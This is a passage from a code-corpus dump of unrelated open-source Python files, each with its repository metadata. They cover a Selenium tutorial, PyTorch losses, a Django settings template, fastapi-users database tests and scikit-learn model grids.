ffill=inf_data.ffill, append_timeframe=False,
date_column=date_column)
return dataframe
| 2.640625 | 3 |
codigo_das_aulas/aula_09/aula_09_03.py | VeirichR/curso-python-selenium | 234 | 5017 | from functools import partial
from selenium.webdriver import Firefox
from selenium.webdriver.support.ui import (
WebDriverWait
)
def esperar_elemento(elemento, webdriver):
print(f'Tentando encontrar "{elemento}"')
if webdriver.find_elements_by_css_selector(elemento):
return True
return False
esperar_botao = partial(esperar_elemento, 'button')
esperar_sucesso = partial(esperar_elemento, '#finished')
url = 'https://selenium.dunossauro.live/aula_09_a.html'
driver = Firefox()
wdw = WebDriverWait(driver, 10)
driver.get(url)
wdw.until(esperar_botao, 'Something went wrong')
driver.find_element_by_css_selector('button').click()
wdw.until(
esperar_sucesso,
    'The success message did not appear'
)
sucesso = driver.find_element_by_css_selector('#finished')
assert sucesso.text == 'Carregamento concluído'  # page text: "Loading complete"
| 2.90625 | 3 |
prae/losses.py | irom-lab/RL_Generalization | 24 | 5018 | <gh_stars>10-100
import torch
from torch import nn
from prae.distances import square_dist, HingedSquaredEuclidean
class Loss(nn.Module):
"""
"""
def __init__(self, hinge, neg=True, rew=True):
"""
"""
super().__init__()
self.reward_loss = square_dist
# If False, no negative sampling
self.neg = neg
# If False, no reward loss
self.rew = rew
self.distance = HingedSquaredEuclidean(eps=hinge)
def forward(self, z_c, z_l, z_n, z_f, r, r_e):
"""
"""
# Transition loss
transition_loss = self.distance.distance(z_n, z_l).mean()
# Reward loss
if self.rew:
reward_loss = 0.5 * self.reward_loss(r, r_e).mean()
else:
reward_loss = torch.zeros_like(transition_loss)
# Negative los
if self.neg:
z_n = tile(z_n, z_f)
batch_size = z_c.shape[0]
negative_loss = self.distance.negative_distance(z_n, z_f).sum()/batch_size
else:
negative_loss = torch.zeros_like(transition_loss)
return transition_loss, reward_loss, negative_loss
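# Usage sketch (illustrative shapes only, not from the original repository): with a batch
# of B latent states of dimension d and K negative samples per state,
#
#   loss_fn = Loss(hinge=1.0)
#   z_c = z_l = z_n = torch.randn(B, d)
#   z_f = torch.randn(B * K, d)              # negatives; tiled against z_n inside forward()
#   r, r_e = torch.randn(B, 1), torch.randn(B, 1)
#   t_loss, r_loss, n_loss = loss_fn(z_c, z_l, z_n, z_f, r, r_e)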
def tile(embedding, example):
"""
"""
n = example.shape[0]//embedding.shape[0]
embedding = embedding.unsqueeze(1).repeat(1, n, 1)
embedding = squeeze_embedding(embedding)
return embedding
def squeeze_embedding(x):
"""
"""
b, n, d = x.shape
x = x.reshape(b*n, d)
return x
| 2.1875 | 2 |
orion/modules/active/wolfram.py | isathish/ai_opesource | 0 | 5019 | <reponame>isathish/ai_opesource
"""
Handles most general questions (including math!)
Requires:
- WolframAlpha API key
Usage Examples:
- "How tall is Mount Everest?"
- "What is the derivative of y = 2x?"
"""
import wolframalpha
from orion.classes.module import Module
from orion.classes.task import ActiveTask
from orion import settings
wolfram_client = wolframalpha.Client(settings.WOLFRAM_KEY)
class AnswerTask(ActiveTask):
def match(self, text):
return True
def action(self, text):
try:
query = wolfram_client.query(text)
self.speak(next(query.results).text)
except:
self.speak(settings.NO_MODULES)
class Wolfram(Module):
def __init__(self):
tasks = [AnswerTask()]
super(Wolfram, self).__init__('wolfram', tasks, priority=0)
| 2.65625 | 3 |
polymatch/matchers/standard.py | linuxdaemon/poly-match | 0 | 5020 | <reponame>linuxdaemon/poly-match
from polymatch import PolymorphicMatcher
class ExactMatcher(PolymorphicMatcher):
def compile_pattern(self, raw_pattern):
return raw_pattern
def compile_pattern_cs(self, raw_pattern):
return raw_pattern
def compile_pattern_ci(self, raw_pattern):
return raw_pattern.lower()
def compile_pattern_cf(self, raw_pattern):
return raw_pattern.casefold()
def match_text(self, pattern, text):
return text == pattern
@classmethod
def get_type(cls):
return "exact"
class ContainsMatcher(PolymorphicMatcher):
def compile_pattern(self, raw_pattern):
return raw_pattern
def compile_pattern_cs(self, raw_pattern):
return raw_pattern
def compile_pattern_ci(self, raw_pattern):
return raw_pattern.lower()
def compile_pattern_cf(self, raw_pattern):
return raw_pattern.casefold()
def match_text(self, pattern, text):
return pattern in text
@classmethod
def get_type(cls):
return "contains"
| 2.90625 | 3 |
djcorsche/settings_default.py | carthage-college/django-djcorsche | 0 | 5021 | <reponame>carthage-college/django-djcorsche
"""
Django settings for project.
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
# Debug
#DEBUG = False
DEBUG = True
TEMPLATE_DEBUG = DEBUG
INFORMIX_DEBUG = "debug"
ADMINS = (
('', ''),
)
MANAGERS = ADMINS
SECRET_KEY = ''
ALLOWED_HOSTS = []
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'America/Chicago'
SITE_ID = 1
USE_I18N = False
USE_L10N = False
USE_TZ = False
DEFAULT_CHARSET = 'utf-8'
FILE_CHARSET = 'utf-8'
SERVER_URL = ""
API_URL = "%s/%s" % (SERVER_URL, "api")
LIVEWHALE_API_URL = "https://%s" % (SERVER_URL)
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
ROOT_DIR = os.path.dirname(__file__)
ROOT_URL = "/djskeletor/"
ROOT_URLCONF = 'djskeletor.core.urls'
WSGI_APPLICATION = 'djskeletor.wsgi.application'
MEDIA_ROOT = ''
ADMIN_MEDIA_PREFIX = '/static/admin/'
STATIC_ROOT = ''
STATIC_URL = "/static/"
STATICFILES_DIRS = ()
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
DATABASES = {
'default': {
'HOST': '127.0.0.1',
'PORT': '3306',
'NAME': 'django_djskeletor',
'ENGINE': 'django.db.backends.mysql',
#'ENGINE': 'django.db.backends.dummy',
'USER': '',
'PASSWORD': ''
},
}
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.formtools',
'django.contrib.humanize',
'django.contrib.messages',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.staticfiles',
'djskeletor',
'djskeletor.core',
'djskeletor.myapp',
'djtools',
)
MIDDLEWARE_CLASSES = (
'django.middleware.cache.UpdateCacheMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.cache.FetchFromCacheMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# the following should be uncommented unless you are
# embedding your apps in iframes
#'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
# template stuff
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
TEMPLATE_DIRS = (
"/data2/django_projects/djskeletor/templates/",
"/data2/django_templates/djkorra/",
"/data2/django_templates/djcher/",
"/data2/django_templates/",
)
TEMPLATE_CONTEXT_PROCESSORS = (
"djtools.context_processors.sitevars",
"django.contrib.auth.context_processors.auth",
"django.core.context_processors.request",
"django.core.context_processors.debug",
"django.core.context_processors.media",
)
# caching
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
#'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
#'LOCATION': '127.0.0.1:11211',
#'BACKEND': 'django.core.cache.backends.filebased.FileBasedCache',
#'LOCATION': '/var/tmp/django_djskeletor_cache',
#'TIMEOUT': 60*20,
#'KEY_PREFIX': "DJSKELETOR_",
#'OPTIONS': {
# 'MAX_ENTRIES': 80000,
#}
}
}
CACHE_MIDDLEWARE_ANONYMOUS_ONLY = True
# LDAP Constants
LDAP_SERVER = ''
LDAP_SERVER_PWM = ''
LDAP_PORT = ''
LDAP_PORT_PWM = ''
LDAP_PROTOCOL = ""
LDAP_PROTOCOL_PWM = ""
LDAP_BASE = ""
LDAP_USER = ""
LDAP_PASS = ""
LDAP_EMAIL_DOMAIN = ""
LDAP_OBJECT_CLASS = ""
LDAP_OBJECT_CLASS_LIST = []
LDAP_GROUPS = {}
LDAP_RETURN = []
LDAP_RETURN_PWM = []
LDAP_ID_ATTR = ""
LDAP_CHALLENGE_ATTR = ""
# auth backends
AUTHENTICATION_BACKENDS = (
'djauth.ldapBackend.LDAPBackend',
'django.contrib.auth.backends.ModelBackend',
)
LOGIN_URL = '/djskeletor/accounts/login/'
LOGIN_REDIRECT_URL = '/djskeletor/'
USE_X_FORWARDED_HOST = True
#SESSION_ENGINE = "django.contrib.sessions.backends.cache"
SESSION_EXPIRE_AT_BROWSER_CLOSE = False
SESSION_COOKIE_DOMAIN=".carthage.edu"
SESSION_COOKIE_NAME ='django_djskeletor_cookie'
SESSION_COOKIE_AGE = 86400
# SMTP settings
EMAIL_HOST = ''
EMAIL_HOST_USER = ''
EMAIL_HOST_PASSWORD = ''
EMAIL_USE_TLS = True
EMAIL_PORT = 587
EMAIL_FAIL_SILENTLY = False
DEFAULT_FROM_EMAIL = ''
SERVER_EMAIL = ''
SERVER_MAIL=''
# logging
LOG_FILEPATH = os.path.join(os.path.dirname(__file__), "logs/")
LOG_FILENAME = LOG_FILEPATH + "debug.log"
LOGGING = {
'version': 1,
'disable_existing_loggers': True,
'formatters': {
'standard': {
'format' : "[%(asctime)s] %(levelname)s [%(name)s:%(lineno)s] %(message)s",
'datefmt' : "%Y/%b/%d %H:%M:%S"
},
'verbose': {
'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s',
'datefmt' : "%Y/%b/%d %H:%M:%S"
},
'simple': {
'format': '%(levelname)s %(message)s'
},
},
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'null': {
'level':'DEBUG',
'class':'django.utils.log.NullHandler',
},
'logfile': {
'level':'DEBUG',
'class':'logging.handlers.RotatingFileHandler',
'filename': LOG_FILENAME,
'maxBytes': 50000,
'backupCount': 2,
'formatter': 'standard',
},
'console':{
'level':'INFO',
'class':'logging.StreamHandler',
'formatter': 'standard'
},
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'include_html': True,
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'djskeletor': {
'handlers':['logfile'],
'propagate': True,
'level':'DEBUG',
},
'django': {
'handlers':['console'],
'propagate': True,
'level':'WARN',
},
'django.db.backends': {
'handlers': ['console'],
'level': 'DEBUG',
'propagate': False,
},
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
| 2.046875 | 2 |
records/12-09/ffff.py | AaronYang2333/CSCI_570 | 36 | 5022 | <filename>records/12-09/ffff.py<gh_stars>10-100
__author__ = '<NAME>'
__email__ = '<EMAIL>'
__date__ = '12/9/2020 4:18 PM'
from abc import abstractmethod
class Product(object):
@abstractmethod
def setMsg(self, msg="default info"):
self.msg = msg
@abstractmethod
def info(self):
print(self.msg)
class DefaultObj(Product):
def __init__(self):
super().setMsg()
class Factory(object):
@abstractmethod
def produce(self):
return DefaultObj()
class PC(Product):
def __init__(self):
self.setMsg('pc info')
class LAPTOP(Product):
def __init__(self):
self.setMsg('laptop info')
class PCFactory(Factory):
def produce(self):
return PC()
class LAPTOPFactory(Factory):
def produce(self):
return LAPTOP()
if __name__ == '__main__':
ss = Factory().produce()
pc = PCFactory().produce()
laptop = LAPTOPFactory().produce()
pc.info()
laptop.info()
ss.info()
| 3.40625 | 3 |
tests/test_users.py | fastapi-users/fastapi-users-db-sqlmodel | 18 | 5023 | <gh_stars>10-100
import uuid
from typing import AsyncGenerator
import pytest
from sqlalchemy import exc
from sqlalchemy.ext.asyncio import AsyncSession, create_async_engine
from sqlalchemy.orm import sessionmaker
from sqlmodel import Session, SQLModel, create_engine
from fastapi_users_db_sqlmodel import (
NotSetOAuthAccountTableError,
SQLModelUserDatabase,
SQLModelUserDatabaseAsync,
)
from tests.conftest import OAuthAccount, UserDB, UserDBOAuth
safe_uuid = uuid.UUID("a9089e5d-2642-406d-a7c0-cbc641aca0ec")
async def init_sync_session(url: str) -> AsyncGenerator[Session, None]:
engine = create_engine(url, connect_args={"check_same_thread": False})
SQLModel.metadata.create_all(engine)
with Session(engine) as session:
yield session
SQLModel.metadata.drop_all(engine)
async def init_async_session(url: str) -> AsyncGenerator[AsyncSession, None]:
engine = create_async_engine(url, connect_args={"check_same_thread": False})
make_session = sessionmaker(engine, class_=AsyncSession, expire_on_commit=False)
async with engine.begin() as conn:
await conn.run_sync(SQLModel.metadata.create_all)
async with make_session() as session:
yield session
    # Re-open a connection for teardown; the one opened above is closed when its context exits.
    async with engine.begin() as conn:
        await conn.run_sync(SQLModel.metadata.drop_all)
@pytest.fixture(
params=[
(init_sync_session, "sqlite:///./test-sqlmodel-user.db", SQLModelUserDatabase),
(
init_async_session,
"sqlite+aiosqlite:///./test-sqlmodel-user.db",
SQLModelUserDatabaseAsync,
),
],
ids=["sync", "async"],
)
async def sqlmodel_user_db(request) -> AsyncGenerator[SQLModelUserDatabase, None]:
create_session = request.param[0]
database_url = request.param[1]
database_class = request.param[2]
async for session in create_session(database_url):
yield database_class(UserDB, session)
@pytest.fixture(
params=[
(
init_sync_session,
"sqlite:///./test-sqlmodel-user-oauth.db",
SQLModelUserDatabase,
),
(
init_async_session,
"sqlite+aiosqlite:///./test-sqlmodel-user-oauth.db",
SQLModelUserDatabaseAsync,
),
],
ids=["sync", "async"],
)
async def sqlmodel_user_db_oauth(request) -> AsyncGenerator[SQLModelUserDatabase, None]:
create_session = request.param[0]
database_url = request.param[1]
database_class = request.param[2]
async for session in create_session(database_url):
yield database_class(UserDBOAuth, session, OAuthAccount)
@pytest.mark.asyncio
@pytest.mark.db
async def test_queries(sqlmodel_user_db: SQLModelUserDatabase[UserDB, OAuthAccount]):
user = UserDB(
id=safe_uuid,
email="<EMAIL>",
hashed_password="<PASSWORD>",
)
# Create
user_db = await sqlmodel_user_db.create(user)
assert user_db.id is not None
assert user_db.is_active is True
assert user_db.is_superuser is False
assert user_db.email == user.email
# Update
user_db.is_superuser = True
await sqlmodel_user_db.update(user_db)
# Get by id
id_user = await sqlmodel_user_db.get(user.id)
assert id_user is not None
assert id_user.id == user_db.id
assert id_user.is_superuser is True
# Get by email
email_user = await sqlmodel_user_db.get_by_email(str(user.email))
assert email_user is not None
assert email_user.id == user_db.id
# Get by uppercased email
email_user = await sqlmodel_user_db.get_by_email("<EMAIL>")
assert email_user is not None
assert email_user.id == user_db.id
# Unknown user
unknown_user = await sqlmodel_user_db.get_by_email("<EMAIL>")
assert unknown_user is None
# Delete user
await sqlmodel_user_db.delete(user)
deleted_user = await sqlmodel_user_db.get(user.id)
assert deleted_user is None
# Exception when trying to get by OAuth account
with pytest.raises(NotSetOAuthAccountTableError):
await sqlmodel_user_db.get_by_oauth_account("foo", "bar")
@pytest.mark.asyncio
@pytest.mark.db
async def test_insert_existing_email(
sqlmodel_user_db: SQLModelUserDatabase[UserDB, OAuthAccount]
):
user = UserDB(
id=safe_uuid,
email="<EMAIL>",
hashed_password="<PASSWORD>",
)
await sqlmodel_user_db.create(user)
with pytest.raises(exc.IntegrityError):
await sqlmodel_user_db.create(
UserDB(id=safe_uuid, email=user.email, hashed_password="<PASSWORD>")
)
@pytest.mark.asyncio
@pytest.mark.db
async def test_insert_non_nullable_fields(
sqlmodel_user_db: SQLModelUserDatabase[UserDB, OAuthAccount]
):
with pytest.raises(exc.IntegrityError):
wrong_user = UserDB(
id=safe_uuid, email="<EMAIL>", hashed_password="<PASSWORD>"
)
wrong_user.email = None # type: ignore
await sqlmodel_user_db.create(wrong_user)
@pytest.mark.asyncio
@pytest.mark.db
async def test_queries_custom_fields(
sqlmodel_user_db: SQLModelUserDatabase[UserDB, OAuthAccount],
):
"""It should output custom fields in query result."""
user = UserDB(
id=safe_uuid,
email="<EMAIL>",
hashed_password="<PASSWORD>",
first_name="Lancelot",
)
await sqlmodel_user_db.create(user)
id_user = await sqlmodel_user_db.get(user.id)
assert id_user is not None
assert id_user.id == user.id
assert id_user.first_name == user.first_name
@pytest.mark.asyncio
@pytest.mark.db
async def test_queries_oauth(
sqlmodel_user_db_oauth: SQLModelUserDatabase[UserDBOAuth, OAuthAccount],
oauth_account1,
oauth_account2,
):
user = UserDBOAuth(
id=safe_uuid,
email="<EMAIL>",
hashed_password="<PASSWORD>",
oauth_accounts=[oauth_account1, oauth_account2],
)
# Create
user_db = await sqlmodel_user_db_oauth.create(user)
assert user_db.id is not None
assert hasattr(user_db, "oauth_accounts")
assert len(user_db.oauth_accounts) == 2
# Update
user_db.oauth_accounts[0].access_token = "NEW_TOKEN"
await sqlmodel_user_db_oauth.update(user_db)
# Get by id
id_user = await sqlmodel_user_db_oauth.get(user.id)
assert id_user is not None
assert id_user.id == user_db.id
assert id_user.oauth_accounts[0].access_token == "NEW_TOKEN"
# Get by email
email_user = await sqlmodel_user_db_oauth.get_by_email(str(user.email))
assert email_user is not None
assert email_user.id == user_db.id
assert len(email_user.oauth_accounts) == 2
# Get by OAuth account
oauth_user = await sqlmodel_user_db_oauth.get_by_oauth_account(
oauth_account1.oauth_name, oauth_account1.account_id
)
assert oauth_user is not None
assert oauth_user.id == user.id
assert len(oauth_user.oauth_accounts) == 2
# Unknown OAuth account
unknown_oauth_user = await sqlmodel_user_db_oauth.get_by_oauth_account("foo", "bar")
assert unknown_oauth_user is None
| 2.125 | 2 |
copy_reg.py | rtbo/vkdgen | 2 | 5024 | <filename>copy_reg.py
#! /usr/bin/env python3
import os
from os import path
root_dir = path.dirname(path.realpath(__file__))
local_reg_dir = path.join(root_dir, 'registry')
os.makedirs(local_reg_dir, exist_ok=True)
def copy_reg(reg_dir, files):
import shutil
for f in files:
file_path = path.join(reg_dir, f)
if not path.isfile(file_path):
raise RuntimeError(file_path + ' could not be found')
shutil.copy2(file_path, path.join(local_reg_dir, path.basename(f)))
vk_files = [ 'registry/vk.xml', 'registry/reg.py', 'registry/generator.py' ]
copy_reg(path.join(root_dir, 'Vulkan-Headers'), vk_files)
| 2.6875 | 3 |
utils.py | atward424/ASCVD_ML | 1 | 5025 | <gh_stars>1-10
import numpy as np
import pandas as pd
import scipy.stats as st
#from medical_ML import Experiment
import matplotlib.pyplot as plt
import xgboost as xgb
from sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier
from sklearn.dummy import DummyClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.linear_model import LogisticRegression, Lasso
from sklearn.neighbors import KNeighborsClassifier
from sklearn.svm import SVC
from sklearn import linear_model
from sklearn.ensemble import RandomForestRegressor, GradientBoostingRegressor
from sklearn.dummy import DummyRegressor
def split_cohort(datafile, to_exclude = None, test_ind_col = None, drop = 'some'):
""" Load and clean the dataset
"""
if isinstance(datafile, str):
data = pd.read_csv(datafile)
else:
data = datafile
test_data = None
if to_exclude is not None:
for k in to_exclude.keys():
if k == 'race':
data = data[data[k].isin(to_exclude[k])]
elif k == 'agebl':
data = data[data[k] >= to_exclude[k]]
elif to_exclude[k]:
data = data[data[k] == 0]
if drop == 'some':
data = data.drop(k, axis = 1)
if drop == 'all':
if (k != 'race') & (k != 'agebl'):
data = data.drop(k, axis = 1)
# self.data = self.data[self.data['year'] <= 2010]
# self.data = self.data.drop(['year'], axis = 1)
if test_ind_col is not None:
test_data = data[data[test_ind_col] == 1]
test_data = test_data.drop(test_ind_col, axis = 1)
data = data[data[test_ind_col] == 0]
data = data.drop(test_ind_col, axis = 1)
return(data, test_data)
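# Usage sketch (the file and column names here are illustrative, not from the original study):
#
#   train_df, test_df = split_cohort('cohort.csv',
#                                    to_exclude={'race': ['White', 'Black'],
#                                                'agebl': 40,
#                                                'prior_mi': True},
#                                    test_ind_col='test_ind',
#                                    drop='some')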
def calc_auc_conf_interval(AUC, N1, N2, ci = 0.95):
# from https://ncss-wpengine.netdna-ssl.com/wp-content/themes/ncss/pdf/Procedures/PASS/Confidence_Intervals_for_the_Area_Under_an_ROC_Curve.pdf
zsc = st.norm.ppf(1 - (1-ci)/2.)
q1 = AUC / (2 - AUC)
q2 = (2 * AUC * AUC) / (1 + AUC)
numerator = AUC * (1 - AUC) + (N1 - 1) * (q1 - AUC * AUC) + (N2 - 1) * (q2 - AUC * AUC)
denom = N1 * N2
se_AUC = np.sqrt(numerator / denom)
return (se_AUC, AUC - zsc * se_AUC, AUC, AUC + zsc * se_AUC)
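# Example call (arbitrary values): for an AUC of 0.75 estimated from 100 positives and
# 300 negatives, the function returns the standard error followed by the lower bound,
# point estimate, and upper bound of the 95% confidence interval.
#
#   se, lower, auc, upper = calc_auc_conf_interval(0.75, N1=100, N2=300, ci=0.95)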
def load_models_and_parameters_default():
models_and_parameters = {
'dummy_reg': (DummyRegressor(),
{"strategy": ["mean"]}),
'lasso_reg': (linear_model.Lasso(),
{'alpha': np.arange(0.1, 1.0, 0.01),
'max_iter': [10000]}),
'rf_reg': (RandomForestRegressor(),
{'n_estimators': [501],
'criterion': ['mae'],
'max_depth': [3, 5, 10],
'max_features': ['auto', 'sqrt', 'log2']}),
'gbm_reg': (GradientBoostingRegressor(),
{'n_estimators': [501],
'criterion': ['mae'],
# 'loss': ['ls', 'lad'],
'max_depth': [3, 5, 10],
'max_features': ['auto', 'sqrt', 'log2']}),
'dummy': (DummyClassifier(),
{"strategy": ["most_frequent"]}),
# 'logreg': (LogisticRegression(),
# {"class_weight": [None],
# "C":[0.1, 0.3, 1,5, 10]}), #, "balanced"
# 'logreg': (LogisticRegression(),
# {"class_weight": [None],
# "C":[0.01,0.1, 1]}), #, "balanced"
# "C":[0.1]}), #, "balanced"
'logreg': (LogisticRegression(),
{}), #, "balanced"
# "C":[0.1]}), #, "balanced"
'lasso': (Lasso(),
{"alpha": [0.0001, 0.001],#np.arange(0.01, 1.01, 0.05),
'max_iter': [10000]}),
# 'lasso2': (LogisticRegression(penalty = 'l1'),
# {"C":[0.001, 0.01,0.1, 1]}),
'lasso2': (LogisticRegression(penalty = 'l1',solver ='saga'),
{}),
'elnet': (LogisticRegression(penalty = 'elasticnet', solver = 'saga'),
{"C":[0.001, 0.01,0.1, 1],
"l1_ratio":[0.01, 0.1, 0.5, 0.9, 0.99]}),
'dt': (DecisionTreeClassifier(),
{"criterion": ["entropy"],
# "max_depth": [2, 3, 4, 5, 10, 20], # None
"max_depth": [1, 2, 3, 4], # None
"splitter": ["best", "random"],
"min_samples_split": [2, 5, 10],
"min_samples_leaf": [3, 5, 10, 15, 20],
"random_state": [817263]}),
'svm': (SVC(),
{'C': [ 1],
'kernel': ['linear']}), #'poly', 'rbf'
'knn': (KNeighborsClassifier(),
{'n_neighbors': [2, 3, 5, 10, 20, 50],
'weights': ['uniform', 'distance']}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [501],
# 'max_depth': [3, 5, 10],
# 'max_features': ['auto', 'sqrt', 'log2']}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [50, 100, 501, 1000],
# 'max_depth': [3,5,7],
# "min_samples_split": [2, 5],
# 'max_features': ['auto', 0.5],
# "class_weight": [None, "balanced"]}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [501],
# 'max_depth': [5],
# "min_samples_split": [5],
# 'max_features': ['auto'],
# "class_weight": [None]}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [ 501, 1000, 2000, 4000],
# 'max_depth': [5, 7, 9, 11, 13],
# "min_samples_split": [2],
# 'max_features': ['sqrt', 0.25, 0.5, 0.75, 1.0],
# "class_weight": [None]}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [200, 500, 1000],
# 'max_depth': [4, 6, 8, 10],
# "min_samples_split": [2, 10],
# 'max_features': [0.25, 0.5],
# "class_weight": [None]}),
'rf': (RandomForestClassifier(),
{'n_estimators': [800],
'max_depth': [8],
"min_samples_split": [10],
'max_features': [0.25],
"class_weight": [None]}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [400, 500, 600],
# 'max_depth': [7,8,9],
# "min_samples_split": [5,10],
# 'max_features': [0.25, 0.5, ]}),
# 'rf': (RandomForestClassifier(),
# {}),
'xgb': (xgb.XGBClassifier(),
{}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [600],
# 'max_depth': [9],
# "min_samples_split": [10],
# 'max_features': [0.25]}),
#
# 'xgb': (xgb.XGBClassifier(),
# {'n_estimators': [100,500],
# 'max_depth': [3,4,5],
# 'learning_rate': [0.1, 0.3],
# "reg_alpha": [0, 1],
# "reg_lambda": [0.1, 1]}),
# 'xgb': (xgb.XGBClassifier(),
# {'n_estimators': [500],
# 'max_depth': [4],
# 'learning_rate': [0.1],
# "reg_alpha": [0, 10],
# "reg_lambda": [0.1, 10]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [200, 300],
# 'learning_rate': [0.01],
# 'max_depth': [3,4,5],
# 'subsample': [0.35, 0.7],
# 'max_features': [0.25]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [400],
# 'learning_rate': [0.01],
# 'max_depth': [5],
# 'subsample': [0.75],
# 'max_features': [0.25]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [300, 400, 500],
# 'learning_rate': [0.01, 0.003, 0.4],
# 'max_depth': [5, 6, 7],
# 'subsample': [0.85, 1],
# 'max_features': [0.25, 0.5]}),
'gbm': (GradientBoostingClassifier(),
{}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [100, 200, 300, 500, 1000, 2000,
# 4000],
# 'max_depth': [2, 3, 4, 5, 6, 7,
# 9],
# 'subsample': [0.75,
# 1],
# 'max_features': ['sqrt', 'log2', 0.25, 0.5, 0.75,
# 1.0]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [100, 200, 400, 800],
# 'learning_rate': [0.03, 0.01, 0.001],
# 'max_depth': [4,5,6,8],
# 'subsample': [0.85],
# 'max_features': [0.25, 0.5]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [400, 600],
# 'learning_rate': [0.01],
# 'max_depth': [5, 6],
# 'subsample': [0.85],
# 'max_features': [0.25]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [25, 50, 75, 100, 200],
# 'max_depth': [2,3,5],
# 'subsample': [0.25, 0.5, 0.75, 1],
# 'max_features': [None, 'sqrt', 'log2', 0.5]}),
}
return(models_and_parameters)
def load_models_and_parameters():
models_and_parameters = {
'dummy_reg': (DummyRegressor(),
{"strategy": ["mean"]}),
'lasso_reg': (linear_model.Lasso(),
{'alpha': np.arange(0.1, 1.0, 0.01),
'max_iter': [10000]}),
'rf_reg': (RandomForestRegressor(),
{'n_estimators': [501],
'criterion': ['mae'],
'max_depth': [3, 5, 10],
'max_features': ['auto', 'sqrt', 'log2']}),
'gbm_reg': (GradientBoostingRegressor(),
{'n_estimators': [501],
'criterion': ['mae'],
# 'loss': ['ls', 'lad'],
'max_depth': [3, 5, 10],
'max_features': ['auto', 'sqrt', 'log2']}),
'dummy': (DummyClassifier(),
{"strategy": ["most_frequent"]}),
# 'logreg': (LogisticRegression(),
# {"class_weight": [None],
# "C":[0.1, 0.3, 1,5, 10]}), #, "balanced"
'logreg': (LogisticRegression(),
{"class_weight": [None],
"C":[0.01,0.1, 1]}), #, "balanced"
# "C":[0.1]}), #, "balanced"
# 'logreg': (LogisticRegression(),
# {}), #, "balanced"
# # "C":[0.1]}), #, "balanced"
'lasso': (Lasso(),
{"alpha": [0.0001, 0.001],#np.arange(0.01, 1.01, 0.05),
'max_iter': [10000]}),
'lasso2': (LogisticRegression(penalty = 'l1', solver ='saga'),
{"C":[0.001, 0.01,0.1, 1]}),
# 'lasso2': (LogisticRegression(penalty = 'l1'),
# {}),
'elnet': (LogisticRegression(penalty = 'elasticnet', solver = 'saga'),
{"C":[0.001, 0.01,0.1, 1],
"l1_ratio":[0.01, 0.1, 0.5, 0.9, 0.99]}),
'dt': (DecisionTreeClassifier(),
{"criterion": ["entropy"],
# "max_depth": [2, 3, 4, 5, 10, 20], # None
"max_depth": [1, 2, 3, 4], # None
"splitter": ["best", "random"],
"min_samples_split": [2, 5, 10],
"min_samples_leaf": [3, 5, 10, 15, 20],
"random_state": [817263]}),
'svm': (SVC(),
{'C': [ 1],
'kernel': ['linear']}), #'poly', 'rbf'
'knn': (KNeighborsClassifier(),
{'n_neighbors': [2, 3, 5, 10, 20, 50],
'weights': ['uniform', 'distance']}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [501],
# 'max_depth': [3, 5, 10],
# 'max_features': ['auto', 'sqrt', 'log2']}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [50, 100, 501, 1000],
# 'max_depth': [3,5,7],
# "min_samples_split": [2, 5],
# 'max_features': ['auto', 0.5],
# "class_weight": [None, "balanced"]}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [501],
# 'max_depth': [5],
# "min_samples_split": [5],
# 'max_features': ['auto'],
# "class_weight": [None]}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [ 501, 1000, 2000, 4000],
# 'max_depth': [5, 7, 9, 11, 13],
# "min_samples_split": [2],
# 'max_features': ['sqrt', 0.25, 0.5, 0.75, 1.0],
# "class_weight": [None]}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [200, 500, 1000],
# 'max_depth': [4, 6, 8, 10],
# "min_samples_split": [2, 10],
# 'max_features': [0.25, 0.5],
# "class_weight": [None]}),
'rf': (RandomForestClassifier(),
{'n_estimators': [500, 1000],
'max_depth': [8],
"min_samples_split": [10],
'max_features': [0.25],
"class_weight": [None]}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [400, 500, 600],
# 'max_depth': [7,8,9],
# "min_samples_split": [5,10],
